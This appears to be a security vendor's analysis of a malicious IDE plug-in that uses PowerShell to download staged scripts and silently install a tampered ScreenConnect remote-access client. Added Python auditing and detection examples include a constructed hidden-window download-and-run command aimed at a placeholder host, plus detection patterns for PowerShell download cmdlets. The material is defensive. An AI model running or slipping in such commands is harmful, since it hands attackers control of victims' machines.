When AI becomes a target
As AI technology develops rapidly, it is increasingly integrated into our daily lives. With this widespread adoption, the risks it faces have also grown. Recently, 360 captured a hacker attack that stands out because the hacker used the plug-in script of an AI development tool to enter the victim’s system, then waited for an opportunity to attack developers who use AI and ultimately make a profit.
AI development tools have hidden dangers
Recently, developers in AI-related industries reported that their data had been leaked or stolen, but they could not find the cause, which attracted the attention of the 360 security team. After investigation, security researchers found that the attack originated in the core tool that developers rely on most – IDE (Integrated Development Environment) software.
Analysis of the victims’ development environments, combined with screening and comparison against 360 cloud big data, showed that this attack was mainly concentrated on Cursor AI and Trae (including Trae CN), two mainstream AI-specific IDE development tools. Because both tools are derivative products based on Microsoft’s open source IDE tool Visual Studio Code (VSCode), the original VSCode is also affected.
Event Analysis
After a systematic investigation of the attacked device, the source of the attack was eventually traced to an IDE plug-in called “Solidity Language”. The plug-in claims to be an auxiliary tool for the currently popular smart contract development language Solidity, providing syntax highlighting, jump to definition, information prompts, quick actions and other practical functions.
Figure 1. Solidity Language plugin
But when analysts located the installation directory of the plug-in, they found that the src directory where the function code was stored was unusually sparse, containing only a JavaScript script file named “extension.js”. The code of this script was also very simple and direct – it just called the system PowerShell to get a file from a remote server and ran it directly in the local background.
Figure 2. Content of extension.js, the only functional script of the malicious plugin
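One way to audit installed extensions for the pattern just described, a plug-in script that shells out to PowerShell to fetch and run remote content. This is an added example, not code from 360 or from the plug-in; the regexes, directory names and sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic patterns: illustrative assumptions, not vendor signatures.
SPAWN = re.compile(r"child_process|\bexec(File|Sync)?\s*\(|\bspawn(Sync)?\s*\(")
SHELL = re.compile(r"powershell|pwsh", re.I)
FETCH = re.compile(r"\b(irm|iwr|iex|Invoke-(WebRequest|RestMethod|Expression)"
                   r"|Download(String|File))\b", re.I)
HIDDEN = re.compile(r"-w\w*\s+hidden|windowsHide", re.I)
EXTRA = [("download-and-run cmdlet", FETCH), ("hidden window", HIDDEN)]

def audit_extension(ext_dir):
    """Return (relative_path, reasons) for each script that shells out to PowerShell."""
    ext_dir = Path(ext_dir)
    scripts = sorted(p for p in ext_dir.rglob("*.js") if "node_modules" not in p.parts)
    findings = []
    for script in scripts:
        text = script.read_text(encoding="utf-8", errors="replace")
        if not (SPAWN.search(text) and SHELL.search(text)):
            continue
        reasons = ["spawns PowerShell"] + [n for n, rx in EXTRA if rx.search(text)]
        if len(scripts) == 1:  # the whole "language plug-in" is a single file
            reasons.append("only script in the extension")
        findings.append((script.relative_to(ext_dir).as_posix(), reasons))
    return findings

def audit_all(extensions_root):
    """Audit every sub-directory of an extensions folder; keep only the hits."""
    hits = {}
    for d in sorted(Path(extensions_root).iterdir()):
        if d.is_dir() and (found := audit_extension(d)):
            hits[d.name] = found
    return hits

def build_sample(root):
    """Constructed sample: an ordinary extension and one shaped like the case above."""
    good = Path(root, "example.good-ext-1.0.0", "out")
    good.mkdir(parents=True)
    (good / "extension.js").write_text('require("child_process").execFile("solc");\n')
    bad = Path(root, "example.lookalike-ext-0.0.1", "src")
    bad.mkdir(parents=True)
    (bad / "extension.js").write_text('require("child_process").exec(\'powershell '
        '-WindowStyle Hidden -Command "irm https://example.invalid/1.txt | iex"\');\n')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(audit_all(tmp))
```

Point `audit_all` at an IDE's extensions folder (for VS Code, typically `~/.vscode/extensions`). A hit is a prompt for manual review, since some legitimate extensions also launch PowerShell.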
The script gets a file named 1.txt from the remote server. This file is not a simple text file, but a PowerShell script. The script first tries to find a service or software called “ScreenConnect Client Service” in the system. If it cannot be found, it calls the system PowerShell again to get another new file from the remote server and then runs it in the local background.
Figure 3. Contents of the PowerShell script named 1.txt
The 2.txt downloaded this time is also a PowerShell script, and its content is simpler and clearer. It only downloads a copy of the remote control software ScreenConnect, customized by the hackers, to the victim’s environment and installs it silently.
Figure 4. A new script named 2.txt downloads the remote control software and installs it silently
ScreenConnect is “regular” software used to remotely manage devices, but the downloaded installation package was “deeply customized” by the hackers. We found that its built-in system.config configuration file had been tampered with, hard-coding the key parameters used for connection and the address of the remote control server that the program connects to, allowing the hackers to control the victim’s device without the victim’s knowledge or authorization.
Figure 5. Installation configuration file of remote control software
By monitoring the traffic data of the remote control software, it was found that the control server domain name was eventually resolved to an IP address located in Las Vegas, Nevada, USA.
Figure 6. The remote control software resolves its control server domain name
After successful resolution, it automatically connects to port 8041 of its control server and starts communicating, waiting for further instructions for subsequent control operations.
Figure 7. Connecting to port 8041 of the control server to communicate and wait for instructions
According to feedback from victimized users, hackers are currently quite interested in various virtual currency wallets, and some victimized developers’ cryptocurrencies have been looted…
Interception and protection
Analysts conducted actual tests on this attack and found that 360 can directly and effectively intercept the first round of PowerShell downloads after the malicious plug-in is loaded, successfully blocking this attack from the source.
Figure 8. 360 successfully intercepted the attack
Therefore, 360 users do not need to worry too much about this attack. They just need to ensure that the 360 client runs normally and the security protection function is enabled normally.
Security Recommendations
Based on the characteristics of this attack, it is recommended that users, especially AI-related developers:
• Install a security terminal
Install security monitoring software to automatically monitor, warn, and intercept various behaviors in the system. Get various security tips and suggestions through security software.
• Strengthen IDE plug-in management
Strictly screen the plug-ins installed in the IDE, and carefully distinguish between plug-ins with similar names.
• Limit PowerShell operation
Tighten the execution permissions of script parsers such as PowerShell as much as possible without affecting normal work. You can also use configuration to restrict the use of execution-related or hidden-window parameters.
• Check software installation
Monitor the installation and execution of software, and regularly review the installed software for unknown programs with potential risks.
• Strengthen network data monitoring
Monitor network traffic data. Once abnormal data traffic is found, block it immediately and trace the data source.
• Conduct security training
Regularly conduct special security training for the development team, especially for the types of threats that developers are more likely to encounter, such as “supply chain attacks” and “social engineering disguises”, to improve the ability to identify malicious plug-ins and suspicious scripts.
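The chain from the Event Analysis section, expressed as a detection rule over process-creation events, as an added example that is not 360's detection logic: it walks each PowerShell process's parent chain so that the second-stage script and any shell in between are still attributed to the IDE. Image names, event fields and sample events are assumptions constructed for illustration.

```python
import re

# Assumed image names for the IDEs named in the article; adjust to your fleet.
IDE_IMAGES = {"code.exe", "cursor.exe", "trae.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
HIDDEN = re.compile(r"-w\w*\s+hidden", re.I)
FETCH = re.compile(r"\b(irm|iwr|iex|Invoke-(WebRequest|RestMethod|Expression)"
                   r"|Download(String|File))\b", re.I)

def ide_ancestor(pid, procs):
    """Walk the parent chain; return the IDE image name if one is an ancestor."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        image = procs[pid]["image"].lower()
        if image in IDE_IMAGES:
            return image
        pid = procs[pid]["ppid"]
    return None

def detect(events):
    """Return alerts for PowerShell started, directly or not, under an IDE."""
    procs, alerts = {}, []
    for ev in events:  # events are assumed to be in start-time order
        procs[ev["pid"]] = ev
        ide = ide_ancestor(ev["ppid"], procs)
        if ev["image"].lower() not in PS_IMAGES or ide is None:
            continue
        flags = [name for name, rx in (("hidden", HIDDEN), ("fetch", FETCH))
                 if rx.search(ev["cmd"])]
        severity = "high" if len(flags) == 2 else "medium" if flags else "low"
        alerts.append({"pid": ev["pid"], "ide": ide, "flags": flags,
                       "severity": severity})
    return alerts

# Constructed process-creation events (fields modelled on typical EDR data).
STAGE = 'powershell -WindowStyle Hidden -Command "irm https://example.invalid/{} | iex"'
SAMPLE = [
    {"pid": 100, "ppid": 1, "image": "Cursor.exe", "cmd": "Cursor.exe"},
    {"pid": 110, "ppid": 100, "image": "cmd.exe", "cmd": 'cmd.exe /d /s /c "powershell ..."'},
    {"pid": 120, "ppid": 110, "image": "powershell.exe", "cmd": STAGE.format("1.txt")},
    {"pid": 130, "ppid": 120, "image": "powershell.exe", "cmd": STAGE.format("2.txt")},
    {"pid": 140, "ppid": 100, "image": "powershell.exe", "cmd": "powershell -NoProfile"},
    {"pid": 200, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 210, "ppid": 200, "image": "powershell.exe", "cmd": "powershell -File backup.ps1"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The low-severity alert for pid 140 stands in for an IDE's integrated terminal, which starts PowerShell legitimately; the hidden-window and download flags are what separate the two cases.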